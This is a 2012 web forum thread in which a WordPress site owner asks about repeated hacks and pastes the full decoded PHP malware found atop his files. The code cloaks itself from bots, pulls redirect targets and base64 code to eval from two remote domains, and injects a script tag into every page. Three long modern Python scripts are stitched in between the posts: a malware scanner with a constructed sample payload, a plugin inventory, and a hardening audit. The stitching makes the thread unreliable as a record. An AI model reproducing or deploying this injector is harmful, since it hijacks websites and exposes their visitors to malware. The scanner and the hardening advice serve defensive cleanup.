Old 05-04-12 at 11:15 AM   #1
Bored

Join Date: Jun 2008
Location: England! =)
Posts: 1,101
Default Webmasters, Wordpress = Regularly hacked?

I use WordPress a lot! It generally makes my life a lot easier.

I keep the core up to date, and pretty much always install plugins like:
Contact Form 7
Really Simple Captcha
Exploit Scanner
All in One SEO
Google Sitemap
WP-eCommerce (if it's a shop site).

I normally get themes from Themeforest (actually purchased):
Juggernaut, Mammoth & Prestige.

I have a fair few domains, but always seem to find they get hacked.
It's one of these hacks that either add some "base decode 64 thing"
with a fairly long string...
And generally I can go to the website, not a problem, but when someone else goes who hasn't been there before, they get told they have malware on their pc etc...

What's the best way to protect myself?
It's pretty common, and wastes so much time reinstalling WP etc.

I don't think it's my host daily.co.uk

Anyone else a webmaster, and have regular attacks?
PunKeD_GuRu is offline  
Discuss Webmasters, Wordpress = Regularly hacked? at the Helpdesk forum within tehPARADOX.COM Online Sharing Community.
Old 05-04-12 at 11:30 AM   #2
Elite

Join Date: Jun 2011
Location: Italic Ocean
Posts: 2,191
I've never had any sort of issues with WP before. Is your WP source up to date and permissions correctly set?
ItalicPixels is offline
Old 05-04-12 at 11:48 AM   #3
Bored

Join Date: Jun 2008
Location: England! =)
Posts: 1,101
WP itself is up to date...
Permissions are a mix of 755 and 644 (depending on being files or folders etc)
PunKeD_GuRu is offline
Old 05-04-12 at 12:05 PM   #4
Bored

Join Date: Jun 2008
Location: England! =)
Posts: 1,101
I find this at the top of most PHP files:

<?php /**/ eval(base64_decode("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"));?>
Which translates to:

if(function_exists('ob_start')&&!isset($_SERVER['mr_no'])){
  $_SERVER['mr_no']=1;
  if(!function_exists('mrobh')){
    // Fetch a URL with whichever transport the host permits: curl, file(), fopen, fsockopen, raw socket.
    function get_tds_777($url){
      $content="";
      $content=@trycurl_777($url);
      if($content!==false)return $content;
      $content=@tryfile_777($url);
      if($content!==false)return $content;
      $content=@tryfopen_777($url);
      if($content!==false)return $content;
      $content=@tryfsockopen_777($url);
      if($content!==false)return $content;
      $content=@trysocket_777($url);
      if($content!==false)return $content;
      return '';
    }
    function trycurl_777($url){
      if(function_exists('curl_init')===false)return false;
      $ch = curl_init ();
      curl_setopt ($ch, CURLOPT_URL,$url);
      curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
      curl_setopt ($ch, CURLOPT_TIMEOUT, 5);
      curl_setopt ($ch, CURLOPT_HEADER, 0);
      $result = curl_exec ($ch);
      curl_close($ch);
      if ($result=="")return false;
      return $result;
    }
    function tryfile_777($url){
      if(function_exists('file')===false)return false;
      $inc=@file($url);
      $buf=@implode('',$inc);
      if ($buf=="")return false;
      return $buf;
    }
    function tryfopen_777($url){
      if(function_exists('fopen')===false)return false;
      $buf='';
      $f=@fopen($url,'r');
      if ($f){
        while(!feof($f)){$buf.=fread($f,10000);}
        fclose($f);
      }else return false;
      if ($buf=="")return false;
      return $buf;
    }
    function tryfsockopen_777($url){
      if(function_exists('fsockopen')===false)return false;
      $p=@parse_url($url);
      $host=$p['host'];
      $uri=$p['path'].'?'.$p['query'];
      $f=@fsockopen($host,80,$errno, $errstr,30);
      if(!$f)return false;
      $request ="GET $uri HTTP/1.0\n";
      $request.="Host: $host\n\n";
      fwrite($f,$request);
      $buf='';
      while(!feof($f)){$buf.=fread($f,10000);}
      fclose($f);
      if ($buf=="")return false;
      list($m,$buf)=explode(chr(13).chr(10).chr(13).chr(10),$buf);
      return $buf;
    }
    function trysocket_777($url){
      if(function_exists('socket_create')===false)return false;
      $p=@parse_url($url);
      $host=$p['host'];
      $uri=$p['path'].'?'.$p['query'];
      $ip1=@gethostbyname($host);
      $ip2=@long2ip(@ip2long($ip1));
      if ($ip1!=$ip2)return false;
      $sock=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
      if (!@socket_connect($sock,$ip1,80)){@socket_close($sock);return false;}
      $request ="GET $uri HTTP/1.0\n";
      $request.="Host: $host\n\n";
      socket_write($sock,$request);
      $buf='';
      while($t=socket_read($sock,10000)){$buf.=$t;}
      @socket_close($sock);
      if ($buf=="")return false;
      list($m,$buf)=explode(chr(13).chr(10).chr(13).chr(10),$buf);
      return $buf;
    }
    // Refresh the cached list of redirect targets from the two remote URLs; anything after "|||CODE|||" in the response is base64 PHP that gets eval'd on the server.
    function update_tds_file_777($tdsfile){
      $actual1=$_SERVER['s_a1'];
      $actual2=$_SERVER['s_a2'];
      $val=get_tds_777($actual1);
      if ($val=="")$val=get_tds_777($actual2);
      $f=@fopen($tdsfile,"w");
      if ($f){@fwrite($f,$val);@fclose($f);}
      if (strstr($val,"|||CODE|||")){
        list($val,$code)=explode("|||CODE|||",$val);
        eval(base64_decode($code));
      }
      return $val;
    }
    // Pick a redirect target from the cached list (log1.txt), refreshing it every s_t1 seconds.
    function get_actual_tds_777(){
      $defaultdomain=$_SERVER['s_d1'];
      $dir=$_SERVER['s_p1'];
      $tdsfile=$dir."log1.txt";
      if (@file_exists($tdsfile)){
        $mtime=@filemtime($tdsfile);
        $ctime=time()-$mtime;
        if ($ctime>$_SERVER['s_t1']){
          $content=update_tds_file_777($tdsfile);
        }else{
          $content=@file_get_contents($tdsfile);
        }
      }else{
        $content=update_tds_file_777($tdsfile);
      }
      $tds=@explode("\n",$content);
      $c=@count($tds)+0;
      $url=$defaultdomain;
      if ($c>1){$url=trim($tds[mt_rand(0,$c-2)]);}
      return $url;
    }
    function is_mac_777($ua){
      $mac=0;
      if (stristr($ua,"mac")||stristr($ua,"safari"))
        if ((!stristr($ua,"windows"))&&(!stristr($ua,"iphone")))$mac=1;
      return $mac;
    }
    function is_msie_777($ua){
      $msie=0;
      if (stristr($ua,"MSIE 6")||stristr($ua,"MSIE 7")||stristr($ua,"MSIE 8")||stristr($ua,"MSIE 9"))$msie=1;
      return $msie;
    }
    // Decide where to cache (a hidden .logs/ directory or /tmp), then classify the visitor: search-engine bots and anything that is neither IE nor Mac/Safari are treated as "bot" and get no injection. This is why the site owner never sees it.
    function setup_globals_777(){
      $rz=$_SERVER["DOCUMENT_ROOT"]."/.logs/";
      $mz="/tmp/";
      if (!is_dir($rz)){
        @mkdir($rz);
        if (is_dir($rz)){
          $mz=$rz;
        }else{
          $rz=$_SERVER["SCRIPT_FILENAME"]."/.logs/";
          if (!is_dir($rz)){
            @mkdir($rz);
            if (is_dir($rz)){$mz=$rz;}
          }else{
            $mz=$rz;
          }
        }
      }else{
        $mz=$rz;
      }
      $bot=0;
      $ua=$_SERVER['HTTP_USER_AGENT'];
      if (stristr($ua,"msnbot")||stristr($ua,"Yahoo"))$bot=1;
      if (stristr($ua,"bingbot")||stristr($ua,"google"))$bot=1;
      $msie=0;
      if (is_msie_777($ua))$msie=1;
      $mac=0;
      if (is_mac_777($ua))$mac=1;
      if (($msie==0)&&($mac==0))$bot=1;
      global $_SERVER;
      $_SERVER['s_p1']=$mz;
      $_SERVER['s_b1']=$bot;
      $_SERVER['s_t1']=1200;
      $_SERVER['s_d1']="http://sweepstakesandcontestsdo.com/";
      $d='?d='.urlencode($_SERVER["HTTP_HOST"])."&p=".urlencode($_SERVER["PHP_SELF"])."&a=".urlencode($_SERVER["HTTP_USER_AGENT"]);
      $_SERVER['s_a1']='http://www.lilypophilypop.com/g_load.php'.$d;
      $_SERVER['s_a2']='http://www.lolypopholypop.com/g_load.php'.$d;
      $_SERVER['s_script']="pmg.php?dr=1";
    }
    setup_globals_777();
    // The injected payload: a <script> tag pointing at the chosen redirect domain, only for non-"bot" visitors.
    if(!function_exists('gml_777')){
      function gml_777(){
        $r_string_777='';
        if ($_SERVER['s_b1']==0)$r_string_777='<script src="'.get_actual_tds_777().$_SERVER['s_script'].'"></script>';
        return $r_string_777;
      }
    }
    // Manual gzip-header parsing so the page can be modified even when PHP has already compressed it.
    if(!function_exists('gzdecodeit')){
      function gzdecodeit($decode){
        $t=@ord(@substr($decode,3,1));
        $start=10;
        $v=0;
        if($t&4){
          $str=@unpack('v',substr($decode,10,2));
          $str=$str[1];
          $start+=2+$str;
        }
        if($t&8){
          $start=@strpos($decode,chr(0),$start)+1;
        }
        if($t&16){
          $start=@strpos($decode,chr(0),$start)+1;
        }
        if($t&2){
          $start+=2;
        }
        $ret=@gzinflate(@substr($decode,$start));
        if($ret===FALSE){
          $ret=$decode;
        }
        return $ret;
      }
    }
    // Output-buffer callback: insert the script tag just before </body> (or append it) in every page the site serves.
    function mrobh($content){
      @Header('Content-Encoding: none');
      $decoded_content=gzdecodeit($content);
      if(preg_match('/\<\/body/si',$decoded_content)){
        return preg_replace('/(\<\/body[^\>]*\>)/si',gml_777()."\n".'$1',$decoded_content);
      }else{
        return $decoded_content.gml_777();
      }
    }
    ob_start('mrobh');
  }
}
PunKeD_GuRu is offline
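The wrapper quoted above (a literal eval(base64_decode("...")) prepended to PHP files, which hides an output-buffer hook and a runtime eval of fetched code) can be found and triaged mechanically. The script below is an added example, not code from the thread or from WordPress: it walks a document root, decodes nested literal wrappers, and reports the indicators a responder wants (line of the injection, ob_start callback name, URLs, whether the payload pulls more code at runtime). The embedded sample file is constructed to mirror the shape of the decoded payload in this post; its domain is a placeholder, not a real indicator.

```python
import base64
import os
import re

# A literal eval(base64_decode("...")) call; base64 alphabet plus whitespace.
EVAL_B64_RE = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*['"]([A-Za-z0-9+/=\s]+)['"]\s*\)\s*\)"""
)
# eval(base64_decode($var)): code fetched at runtime, cannot be read statically.
DYNAMIC_EVAL_RE = re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*\$")
URL_RE = re.compile(r"""https?://[^\s'"<>]+""")
OB_START_RE = re.compile(r"""ob_start\s*\(\s*['"](\w+)['"]\s*\)""")
MAX_LAYERS = 5  # how many nested literal wrappers to unwrap


def analyse_php_source(text):
    """Return None if no literal eval(base64_decode()) wrapper is present,
    otherwise a finding dict describing the decoded payload."""
    m = EVAL_B64_RE.search(text)
    if m is None:
        return None
    layers = []
    current = m.group(1)
    for _ in range(MAX_LAYERS):
        try:
            raw = base64.b64decode("".join(current.split()), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            break
        decoded = raw.decode("utf-8", "replace")
        layers.append(decoded)
        inner = EVAL_B64_RE.search(decoded)  # another literal wrapper inside?
        if inner is None:
            break
        current = inner.group(1)
    decoded_all = "\n".join(layers)
    hook = OB_START_RE.search(decoded_all)
    return {
        "line": text.count("\n", 0, m.start()) + 1,
        "layers": len(layers),
        "urls": sorted(set(URL_RE.findall(decoded_all))),
        "ob_start_callback": hook.group(1) if hook else None,
        "dynamic_eval": DYNAMIC_EVAL_RE.search(decoded_all) is not None,
        "decoded": decoded_all,
    }


def scan_tree(root):
    """Walk a document root and return {path: finding} for infected PHP files."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".inc")):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    finding = analyse_php_source(fh.read())
            except OSError:
                continue
            if finding:
                findings[path] = finding
    return findings


# Constructed sample mirroring the decoded payload's shape (output-buffer
# callback appending a <script> tag, plus a runtime eval of fetched code).
# The domain is a placeholder, not a real indicator.
INNER_PHP = (
    "if(function_exists('ob_start')&&!isset($_SERVER['mr_no'])){"
    "$_SERVER['s_d1']=\"http://tds-placeholder.example/\";"
    "$_SERVER['s_a1']='http://tds-placeholder.example/g_load.php';"
    "function mrobh($c){return $c.'<script src=\"'.$_SERVER['s_d1'].'pmg.php\"></script>';}"
    "eval(base64_decode($code));"
    "ob_start('mrobh');}"
)
SAMPLE_FILE = (
    '<?php /**/ eval(base64_decode("'
    + base64.b64encode(INNER_PHP.encode()).decode()
    + '"));?>\n<?php\n// the plugin\'s real code would follow here\n'
)
# The same file wrapped a second time, to exercise nested-layer unwrapping.
NESTED_SAMPLE = (
    '<?php eval(base64_decode("'
    + base64.b64encode(SAMPLE_FILE.encode()).decode()
    + '"));?>'
)

if __name__ == "__main__":
    import sys
    for path, f in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(f"{path}:{f['line']} layers={f['layers']} hook={f['ob_start_callback']} urls={f['urls']}")
```

Run it as `python scan.py /path/to/docroot`; every reported file needs restoring from a clean copy, and the URLs and the `.logs/` cache directory the payload creates are what to look for in web-server and filesystem logs. It only catches literal wrappers; a payload that assembles its base64 string at runtime would need a different signature.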
Old 05-04-12 at 12:32 PM   #5
Novice
Join Date: Aug 2007
Location: In the Free Rockin' World
Posts: 183
Hey there.

I run my own servers, mostly loaded up with Joomla and Wordpress sites.
I have about 50 at the moment.
I have been operating for about 4 years, and have never had a single site hacked.

If you'd like me to host your sites, I have direct access to logs and can help you track down the source of the hack.

If your Wordpress install is up-to-date, then it will be a 3rd party plugin that contains a vulnerability. If you can list EVERY plugin you have installed and include THE EXACT VERSION NUMBER OF EACH, then I can possibly help you find the culprit this way.

In any case, good luck.

PS Permissions are not really relevant, UNTIL someone finds a vulnerability in some code in your site and manages to get some kind of shell access.

Last edited by darquillity; 05-04-12 at 12:34 PM.
darquillity is offline
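Producing the list this reply asks for (every plugin with its exact version) does not have to be done by hand. The script below is an added example, not code from the thread or from WordPress: it reads the comment header WordPress itself uses for plugin metadata (a "Plugin Name:" line is required, "Version:" is optional) from each plugin's main PHP file, and the core version from `$wp_version` in wp-includes/version.php. The sample header and version string embedded at the end are constructed placeholders.

```python
import os
import re

HEADER_FIELDS = ("Plugin Name", "Version", "Plugin URI", "Author")
WP_VERSION_RE = re.compile(r"""\$wp_version\s*=\s*['"]([^'"]+)['"]""")


def parse_plugin_header(text):
    """Return {field: value} from the header comment in the first 8 KiB of a
    PHP file, or None when the file carries no "Plugin Name:" line."""
    head = text[:8192]
    fields = {}
    for name in HEADER_FIELDS:
        # Same shape WordPress uses: optional comment punctuation, the field
        # name, a colon, the rest of the line.
        m = re.search(r"^[ \t/*#@]*" + re.escape(name) + r":(.*)$", head,
                      re.MULTILINE | re.IGNORECASE)
        if m:
            value = re.sub(r"\s*(?:\*/|\?>).*", "", m.group(1)).strip()
            if value:
                fields[name] = value
    if "Plugin Name" not in fields:
        return None
    fields.setdefault("Version", "UNKNOWN")  # plugin ships no Version: line
    return fields


def parse_wp_version(version_php_text):
    """Core version from the contents of wp-includes/version.php."""
    m = WP_VERSION_RE.search(version_php_text)
    return m.group(1) if m else "UNKNOWN"


def inventory_plugins(plugins_dir):
    """Scan wp-content/plugins: the top-level .php files of each plugin
    folder and any loose .php files are candidate main files."""
    found = []
    for entry in sorted(os.listdir(plugins_dir)):
        full = os.path.join(plugins_dir, entry)
        if os.path.isdir(full):
            candidates = [os.path.join(full, n) for n in sorted(os.listdir(full))
                          if n.endswith(".php")]
        elif entry.endswith(".php"):
            candidates = [full]
        else:
            continue
        for path in candidates:
            with open(path, encoding="utf-8", errors="replace") as fh:
                header = parse_plugin_header(fh.read())
            if header:
                header["file"] = os.path.relpath(path, plugins_dir).replace(os.sep, "/")
                found.append(header)
    return found


def format_report(wp_version, plugins):
    """One line per plugin, ready to paste into a thread like this one."""
    lines = [f"WordPress core: {wp_version}"]
    for p in plugins:
        lines.append(f"{p['Plugin Name']} {p['Version']} ({p['file']})")
    return "\n".join(lines)


# Constructed sample inputs; names, URL and version numbers are placeholders.
SAMPLE_HEADER = """<?php
/*
Plugin Name: Example Contact Plugin
Plugin URI: http://plugin-placeholder.example/
Description: Constructed header for this example; not a real plugin.
Version: 1.2.3
Author: Placeholder Author
*/
"""
SAMPLE_VERSION_PHP = "<?php\n$wp_version = '0.0.0-placeholder';\n"

if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    with open(os.path.join(root, "wp-includes", "version.php"),
              encoding="utf-8", errors="replace") as fh:
        core = parse_wp_version(fh.read())
    print(format_report(core, inventory_plugins(os.path.join(root, "wp-content", "plugins"))))
```

Run it against the site root; the report is the plugin/version list to compare against the vendors' changelogs and advisories. Plugins whose main file is in a nested folder are skipped, so a missing entry should be checked by hand rather than assumed absent.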
Old 05-05-12 at 01:29 PM   #6
Elder

Join Date: Dec 2008
Location: $_POST['WIN!'];
Posts: 2,665
Seems like a hack of the e-commerce plugin, there is a variant of it here:

http://forums.oscommerce.com/topic/345957-evalbase64-decode-hack/
(this is from 2009) but there is a lot of them if you Google around in other cart apps. Hope that helps.

Cheers,

Jiff
JiffOrange is online now
Old 06-11-12 at 04:15 AM   #7
Newcomer
Join Date: Jun 2012
Posts: 18
Wordpress is rarely hacked directly, it is usually inept hosting that is r00ted from some other site or via a server exploit, then all sites can be taken over, wordpress included, so if your hosting sux, then chances are everyone on it will be hacked.

You can do a few things to secure it though, such as remove any help or text files, put an index file in the uploads dir, if installtroned remove the config-example.php, etc.
BobbyGambler is offline
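The hardening steps in this reply can be checked and applied with a short script. The one below is an added example, not code from the thread or from WordPress. The file names are WordPress's own (readme.html, license.txt, wp-config-sample.php); reading the post's "help or text files" and "config-example.php" as those three files, and the choice of which directories get a stub index.php, are this example's assumptions. The snapshot at the end is a constructed directory layout, used in place of a real install.

```python
import os

# Files WordPress ships that a production site does not need (readme.html
# also discloses the exact core version).
REMOVABLE_FILES = ("readme.html", "license.txt", "wp-config-sample.php")
# Directories that should not be browsable; a stub index.php stops
# directory listings when the web server has autoindex enabled.
LISTING_SENSITIVE_DIRS = ("wp-content/uploads", "wp-content/plugins", "wp-content/themes")
INDEX_STUB = "<?php\n// Silence is golden.\n"


def audit_layout(existing):
    """Pure check over a set of relative paths (forward slashes), so it can be
    run against any snapshot. Returns [(action, relative_path), ...]."""
    issues = []
    for name in REMOVABLE_FILES:
        if name in existing:
            issues.append(("remove", name))
    for d in LISTING_SENSITIVE_DIRS:
        if d in existing and not ({d + "/index.php", d + "/index.html"} & existing):
            issues.append(("add-index", d + "/index.php"))
    return issues


def collect_paths(root):
    """Relative paths of every file and directory under root."""
    paths = set()
    for dirpath, dirs, files in os.walk(root):
        rel = os.path.relpath(dirpath, root).replace(os.sep, "/")
        prefix = "" if rel == "." else rel + "/"
        paths.update(prefix + d for d in dirs)
        paths.update(prefix + f for f in files)
    return paths


def audit_wordpress_root(root):
    return audit_layout(collect_paths(root))


def apply_fixes(root, issues):
    """Carry out the actions audit_layout reported. Returns the paths touched."""
    touched = []
    for action, rel in issues:
        path = os.path.join(root, *rel.split("/"))
        if action == "remove":
            os.remove(path)
        elif action == "add-index":
            with open(path, "x") as fh:  # "x": never overwrite an existing index
                fh.write(INDEX_STUB)
        touched.append(path)
    return touched


# Constructed snapshot of a fresh install plus an uploads folder (a fresh
# install already has index.php in plugins/ and themes/, but not in uploads/).
SAMPLE_LAYOUT = {
    "index.php", "wp-config.php", "wp-config-sample.php", "readme.html",
    "license.txt", "wp-content", "wp-content/uploads", "wp-content/uploads/2012",
    "wp-content/plugins", "wp-content/plugins/index.php",
    "wp-content/themes", "wp-content/themes/index.php",
}

if __name__ == "__main__":
    import sys
    args = [a for a in sys.argv[1:] if a != "--fix"]
    root = args[0] if args else "."
    issues = audit_wordpress_root(root)
    for action, rel in issues:
        print(f"{action}: {rel}")
    if "--fix" in sys.argv:
        apply_fixes(root, issues)
```

`python audit.py /path/to/docroot` only reports; add `--fix` to remove the files and write the stubs. Keep the audit separate from the fix so it can run on a schedule: a removed file that comes back after a core update, or an index.php that disappears, is worth noticing. None of this stops the plugin-level compromise the thread is about, it just removes easy reconnaissance and directory browsing.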
All times are GMT -7.